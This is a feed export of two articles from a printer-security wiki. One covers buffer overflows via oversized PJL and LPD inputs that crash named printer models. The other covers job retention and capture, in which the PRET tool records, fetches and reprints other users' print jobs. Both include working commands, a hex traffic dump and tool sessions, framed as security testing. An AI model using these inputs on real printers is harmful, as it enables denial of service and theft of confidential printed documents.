http://hacking-printers.net/wiki/api.php?action=feedcontributions&feedformat=atom&user=134.147.24.11Hacking Printers - User contributions [en]2026-06-22T14:52:44ZUser contributionsMediaWiki 1.26.4http://hacking-printers.net/wiki/index.php?title=Buffer_overflows&diff=289Buffer overflows2017-01-28T19:02:19Z<p>134.147.24.11: </p>
<hr />
<div>While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser.<br />
<br />
== PJL input ==<br />
<br />
[[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]):<br />
<br />
@PJL INQUIRE 00000000000000000000000000000000000000000000000000000…<br />
<br />
Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life:<br />
<br />
@PJL SET 000000000000000000000000000000000000000000000000000000000…<br />
<br />
'''How to test for this attack?'''<br />
<br />
Buffer overflows in PJL input can be tested using [[PRET]]'s ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref> and all PJL variables dynamically retrieved from the system:<br />
<br />
./pret.py -q printer pjl<br />
Connection to printer established<br />
<br />
Welcome to the pret shell. Type help or ? to list commands.<br />
printer:/> flood<br />
Buffer size: 10000, Sending: @PJL SET [buffer]<br />
Buffer size: 10000, Sending: @PJL [buffer]<br />
Buffer size: 10000, Sending: @PJL COMMENT [buffer]<br />
Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer]<br />
Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]"<br />
Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]"<br />
Buffer size: 10000, Sending: @PJL INFO [buffer]<br />
Buffer size: 10000, Sending: @PJL ECHO [buffer]<br />
Buffer size: 10000, Sending: @PJL INQUIRE [buffer]<br />
Buffer size: 10000, Sending: @PJL DINQUIRE [buffer]<br />
Buffer size: 10000, Sending: @PJL USTATUS [buffer]<br />
Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]"<br />
Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]"<br />
Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]"<br />
Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]"<br />
Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]"<br />
Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]"<br />
<br />
'''Who can perform this attack?'''<br />
<br />
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].<br />
<br />
== LPD daemon ==<br />
<br />
The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life. A network traffic dump for this attack is given below:<br />
<br />
> 02 6c 70 0a .lp.<br />
< 00 .<br />
> 02 31 35 32 20 63 66 41 30 30 31 0a .152 cfA001.<br />
< 00 .<br />
> 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx<br />
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx<br />
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx<br />
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx<br />
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx<br />
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx<br />
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx<br />
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx<br />
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx<br />
> 78 78 78 78 78 78 78 0a 00 xxxxxxx..<br />
<br />
'''How to test for this attack?'''<br />
<br />
A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in [[PRET]]. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output):<br />
<br />
<syntaxhighlight lang=sh><br />
./lpdtest.py printer in "`python -c 'print "x"*150'`"<br />
</syntaxhighlight><br />
<br />
'''Who can perform this attack?'''<br />
<br />
Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross-site printing]]).<br />
<br />
<br />
-------------</div>134.147.24.11http://hacking-printers.net/wiki/index.php?title=Print_job_retention&diff=288Print job retention2017-01-28T18:54:04Z<p>134.147.24.11: </p>
<hr />
<div>The most valuable data found on printers is print jobs themselves. Even in a digital world, important documents are printed and kept as hard copies. In high security environments with encrypted hard disks and network traffic, printers might be the weakest link in the security chain. However, even with access to the file system of a printer device an attacker cannot retrieve print jobs unless they have explicitly been stored. This is because print jobs are processed on-the-fly in memory only and never touch the hard disk. This article discusses legitimate print job retention features and methods to actively capture documents to being printed.<br />
<br />
== Job Retention ==<br />
<br />
Some printers have stored print jobs accessible from the web server (for example, the ''HP DesignJet Z6100ps''). Usually however, job retention must be explicitly activated for a certain print job which can be done using standard PJL commands or proprietary PostScript code. Jobs are then kept in memory and can be reprinted from the control panel.<br />
<br />
=== PJL ===<br />
<br />
Legitimate job retention can be enabled for the current document by setting the PJL ''HOLD'' variable <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 10-2</ref> as shown below:<br />
<br />
@PJL SET HOLD=ON<br />
[actual data to be printed follows]<br />
<br />
Hold jobs are kept in memory and can be reprinted from the printer's control panel. This feature is supported by various printers, however as it seems only some Epson devices allow permanent job retention beeing set using <code>@PJL DEFAULT HOLD=ON</code>.<br />
<br />
'''How to test for this attack?'''<br />
<br />
Use [[PRET]]'s ''hold'' command in ''pjl'' mode and to check if permanent job retention can be set:<br />
<br />
./pret.py -q printer pjl<br />
Connection to printer established<br />
<br />
Welcome to the pret shell. Type help or ? to list commands.<br />
printer:/> hold<br />
Setting job retention, reconnecting to see if still enabled<br />
Retention for future print jobs: OFF<br />
<br />
'''Who can perform this attack?'''<br />
<br />
This feature can only be exploited by a physical/local attacker to reprint stored jobs.<br />
<br />
=== PostScript ===<br />
<br />
PostScript offers similar functionality which however is model- and vendor-specific. For the HP LaserJet 4k series and various Kyocera printers, job retention can be enabled by prepending the following commands to a PostScript document:<br />
<br />
<syntaxhighlight lang=postscript><br />
<< /Collate true /CollateDetails<br />
<< /Hold 1 /Type 8 >> >> setpagedevice<br />
</syntaxhighlight><br />
<br />
While it is theoretically possible to permanently enable PostScript job retention using the [[PostScript#Security_features|startjob]] operator, this setting is explicitly reset by ''CUPS'' at the beginning of each print job using <code><< /Collate false >> setpagedevice</code>. To counter this protection mechanism however, the attacker can permanently redefine the <code>setpagedevice</code> operator to have no effect at all.<br />
<br />
'''How to test for this attack?'''<br />
<br />
Use [[PRET]]'s ''hold'' command in ''ps'' mode:<br />
<br />
./pret.py -q printer ps<br />
Connection to printer established<br />
<br />
Welcome to the pret shell. Type help or ? to list commands.<br />
printer:/> hold<br />
Job retention enabled.<br />
<br />
'''Who can perform this attack?'''<br />
<br />
This feature can only be exploited by a physical/local attacker to reprint stored jobs.<br />
<br />
== Job Capture ==<br />
<br />
It is possible but uncommon to activate job retention in the printing dialog as discussed above. With PostScript however, one has complete access over the current print job and with the [[PostScript#Security_features|startjob]] operator, it is even possible to break out of the server loop and access future jobs. Such functionality has the potential to capture all documents if PostScript is used as a printer driver.<br />
<br />
=== PostScript ===<br />
<br />
With the capability to hook into arbitrary PostScript operators it is possible to manipulate and access foreign print jobs. To parse the actual datastream send to the printer, one can apply a pretty cool feature of the PostScript language: to read its own program code as data using the ''currentfile'' operator. This way, the whole datastream to be processed by the PostScript interpreter can be accessed by reading and stored to a file on the printer device. If the printer does not offer [[file system access]], captured documents can be stored in memory, for example within permanent PostScript dictionaries. One practical problem is to decide which operator should be hooked as one does not gain access to the datastream until this operator is processed by the PostScript interpreter. As an attacker wants to capture print jobs from the very beginning, the redefined operator must be the very first operator contained in the PostScript document. Fortunately all documents printed with CUPS are pressed into a fixed structure beginning with <code>currentfile /ASCII85Decode filter /LZWDecode filter cvx exec</code>. Based on the assumption of such a fixed structure, the attacker can capture documents from the beginning and execute (aka print) the file afterwards. For printing systems other than CUPS this attack should also be possible, but operators need to be adapted. Note that the PostScript header which usually includes media size, user and job names cannot be captured using this method because we first hook into at the beginning of the actual document. Another possibility may be ''BeginPage'' if supported by the printer. This vulnerability has presumably been present in printing devices for decades as solely language constructs defined by the PostScript standard are abused.<br />
<br />
'''How to test for this attack?'''<br />
<br />
Use [[PRET]]'s ''capture'' command in ''ps'' mode:<br />
<br />
./pret.py -q printer ps<br />
Connection to printer established<br />
<br />
Welcome to the pret shell. Type help or ? to list commands.<br />
<br />
printer:/> capture <br />
Print job operations: capture <operation><br />
capture start - Record future print jobs.<br />
capture stop - End capturing print jobs.<br />
capture list - Show captured print jobs.<br />
capture fetch - Save captured print jobs.<br />
capture print - Reprint saved print jobs.<br />
printer:/> capture start<br />
Future print jobs will be captured in memory!<br />
printer:/> exit<br />
<br />
Now, print arbitrary documents (make sure PRET is disconnected to not block the printing channel). Afterwards, you can list, fetch or reprint captured documents:<br />
<br />
./pret.py -q printer ps<br />
Connection to printer established<br />
<br />
Welcome to the pret shell. Type help or ? to list commands.<br />
printer:/> capture list<br />
Free virtual memory: 16.6M | Limit to capture: 5.0M<br />
date size user jobname creator <br />
───────────────────────────────────────────────────────────────────────────────<br />
Jan 25 18:38 3.1M - - - <br />
Jan 25 18:40 170K - - - <br />
printer:/> capture fetch<br />
Receiving capture/printer/690782792<br />
3239748 bytes received. <br />
Receiving capture/printer/690646210<br />
174037 bytes received.<br />
printer:/> capture print<br />
printing...<br />
printing...<br />
2 jobs reprinted<br />
printer:/> capture stop<br />
Stopping job capture, deleting recorded jobs<br />
<br />
'''Who can perform this attack?'''<br />
<br />
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].</div>134.147.24.11